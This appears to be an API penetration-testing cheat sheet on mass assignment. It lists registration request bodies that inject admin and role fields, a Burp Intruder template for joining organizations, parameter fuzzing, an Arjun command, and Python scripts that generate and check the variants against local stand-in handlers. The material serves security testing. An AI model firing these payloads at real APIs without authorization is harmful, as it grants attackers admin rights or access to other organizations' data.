mass assignment

Mass Assignment Testing Steps

Target Functionality (where mass assignment is most often found):

  • Account Registration

  • Unauthorized Access to Organizations

  • Reset Password

  • Login

  • Change Email

  • Change Username

Account Registration Request:

  • Basic Request:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "password": "Password1!"
    }

Mass Assignment Variations:

  1. Try with admin key:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "admin": true,
      "password": "Password1!"
    }
  2. Try with ADMIN key:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "ADMIN": true,
      "password": "Password1!"
    }
  3. Try with isadmin key:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "isadmin": true,
      "password": "Password1!"
    }
  4. Try with ISADMIN key:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "ISADMIN": true,
      "password": "Password1!"
    }
  5. Try with Admin key:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "Admin": true,
      "password": "Password1!"
    }
  6. Try with role set to admin:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "role": "admin",
      "password": "Password1!"
    }
  7. Try with role set to ADMIN:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "role": "ADMIN",
      "password": "Password1!"
    }
  8. Try with role set to administrator:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "role": "administrator",
      "password": "Password1!"
    }
  9. Try with user_priv set to administrator:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "user_priv": "administrator",
      "password": "Password1!"
    }
  10. Try with user_priv set to admin:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "user_priv": "admin",
      "password": "Password1!"
    }
  11. Try with admin as integer:

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "admin": 1,
      "password": "Password1!"
    }
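
The eleven variations above are one procedure: take the working registration body, add a single privilege-related key, and see whether the server binds it. The script below is an added example (not from the original page) that generates those variants programmatically and exercises them against two stand-in handlers: a deliberately vulnerable one that binds every JSON key onto the user record, and a hardened one that copies only an allow-list of client-settable fields. The key lists extend the page's set with a few extra case and type permutations; the handlers, field names and the `is_privileged` check are assumptions made for the demonstration, not the behaviour of any real API.

```python
import json

# Constructed sample: the page's basic registration body.
BASE_BODY = {"username": "hAPI_hacker", "email": "hapi@hacker.com", "password": "Password1!"}

# Privilege keys/values from the page's variations, plus a few case/type permutations
# (assumption: the target might bind any of these names).
BOOL_KEYS = ["admin", "Admin", "ADMIN", "isadmin", "ISADMIN", "is_admin"]
BOOL_VALUES = [True, 1, "true"]
ROLE_KEYS = ["role", "user_priv"]
ROLE_VALUES = ["admin", "ADMIN", "administrator"]


def generate_variants(base):
    """Yield (key, value, body): one registration body per injected privilege key/value."""
    for key in BOOL_KEYS:
        for val in BOOL_VALUES:
            yield key, val, {**base, key: val}
    for key in ROLE_KEYS:
        for val in ROLE_VALUES:
            yield key, val, {**base, key: val}


# Hypothetical user record; "admin" and "role" are the server-controlled fields.
def new_user_record():
    return {"username": None, "email": None, "admin": False, "role": "user"}


def vulnerable_register(body):
    """Stand-in for a vulnerable API: every JSON key is bound onto the new user record."""
    user = new_user_record()
    user.update(body)           # mass assignment: the client controls privilege fields
    user.pop("password", None)  # password would be hashed and stored elsewhere
    return user


ALLOWED_FIELDS = {"username", "email"}


def hardened_register(body):
    """Hardened stand-in: only allow-listed, client-settable fields are copied."""
    user = new_user_record()
    for field in ALLOWED_FIELDS:
        if field in body:
            user[field] = body[field]
    return user


def is_privileged(user):
    """Assumed server-side privilege check that the probe tries to trip."""
    admin = user.get("admin")
    admin_set = admin is True or admin == 1 or (isinstance(admin, str) and admin.lower() == "true")
    role = str(user.get("role", "")).lower()
    return admin_set or role in {"admin", "administrator"}


def run_probe(register):
    """Send every variant through `register` and return the (key, value) pairs that yielded admin."""
    hits = []
    for key, val, body in generate_variants(BASE_BODY):
        # Round-trip through JSON so types behave as they would in a real request.
        user = register(json.loads(json.dumps(body)))
        if is_privileged(user):
            hits.append((key, val))
    return hits


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_register), ("hardened", hardened_register)):
        print(f"{name}: {run_probe(handler)}")
```

Only the variants whose key matches a real field on the server-side model ("admin" and "role" in this stand-in) succeed against the vulnerable handler, which is why the page tries so many spellings; the hardened handler yields no hits regardless of spelling because it never consults the unknown keys at all.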

Unauthorized Access to Organizations:

  • Register with Organization (the § markers are Burp Suite Intruder payload positions; load the payload set with candidate organization names or IDs):

    POST /api/v1/register
    --snip--
    {
      "username": "hAPI_hacker",
      "email": "hapi@hacker.com",
      "org": "§CompanyA§",
      "password": "Password1!"
    }

Finding Variables in Documentation:

  • Read the API documentation, and the response bodies of other endpoints, for object fields that the registration request does not expose (privilege flags, roles, organization attributes), then add those field names to the request body.

Fuzzing Unknown Variables:

  • Perform actions in the web application, intercept the requests, and note any additional headers or parameters that other requests send; add them to the target request and compare the response with a baseline to see which ones the server accepts.

    POST /create/user
    --snip--
    {
      "username": "hapi_hacker",
      "pass": "ff7ftw",
      "uam": 1,
      "mfa": true,
      "account": 101
    }
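
Knowing which fuzzed parameters the server actually bound is the hard part of the step above. The code below is an added example (not from the original page) that flattens two JSON responses, a baseline registration and one made with the fuzzed body from the request above, and reports the injected keys whose corresponding response field changed to the injected value. The two responses are constructed for the demonstration; in them "mfa" and "account" are assumed to have been accepted while "uam" is assumed to have been ignored, and "id" changes between any two registrations and is treated as noise.

```python
import json

# Constructed sample responses (not real traffic): the baseline registration
# response and the response after sending the fuzzed body from the page.
BASELINE_RESPONSE = json.dumps({
    "id": 1337, "username": "hapi_hacker", "account": 100,
    "settings": {"mfa": False, "uam": 0},
})
PROBE_RESPONSE = json.dumps({
    "id": 1338, "username": "hapi_hacker", "account": 101,
    "settings": {"mfa": True, "uam": 0},
})
PROBE_BODY = {"username": "hapi_hacker", "pass": "ff7ftw", "uam": 1, "mfa": True, "account": 101}

# Leaf names that legitimately differ between any two registrations (assumed list).
NOISE_KEYS = {"id", "created_at", "token"}


def flatten(obj, prefix=""):
    """Flatten nested JSON into dotted paths, e.g. {'settings.mfa': True}."""
    out = {}
    if isinstance(obj, dict):
        for k, v in obj.items():
            out.update(flatten(v, f"{prefix}{k}."))
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            out.update(flatten(v, f"{prefix}{i}."))
    else:
        out[prefix[:-1]] = obj
    return out


def changed_keys(baseline_raw, probe_raw):
    """Dotted paths whose value differs (or that appear only once) between the two responses,
    excluding known per-request noise."""
    base = flatten(json.loads(baseline_raw))
    probe = flatten(json.loads(probe_raw))
    return {
        path for path in base.keys() | probe.keys()
        if base.get(path) != probe.get(path) and path.split(".")[-1] not in NOISE_KEYS
    }


def accepted_parameters(body, baseline_raw, probe_raw):
    """Map each injected body key to the response path that changed AND now holds the injected
    value; keys absent from the mapping were apparently ignored by the server."""
    probe = flatten(json.loads(probe_raw))
    accepted = {}
    for key, val in body.items():
        for path in changed_keys(baseline_raw, probe_raw):
            if path.split(".")[-1] == key and probe.get(path) == val:
                accepted[key] = path
    return accepted


if __name__ == "__main__":
    print("changed:", sorted(changed_keys(BASELINE_RESPONSE, PROBE_RESPONSE)))
    print("accepted:", accepted_parameters(PROBE_BODY, BASELINE_RESPONSE, PROBE_RESPONSE))
```

A field that changed but does not carry the injected value (or a response that stays identical) is not proof the parameter was ignored: the server may store it without echoing it back, so follow up with a read request for the created object before writing the parameter off.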

Automating Mass Assignment Attacks:

  • Use Arjun to discover parameters the endpoint accepts (the `$arjun$` placeholder in `--include` marks where each guessed parameter is inserted into the JSON body), then feed the discovered names to Burp Suite Intruder as a payload set:

    arjun --headers "Content-Type: application/json" -u http://vulnhost.com/api/register -m JSON --include='{$arjun$}'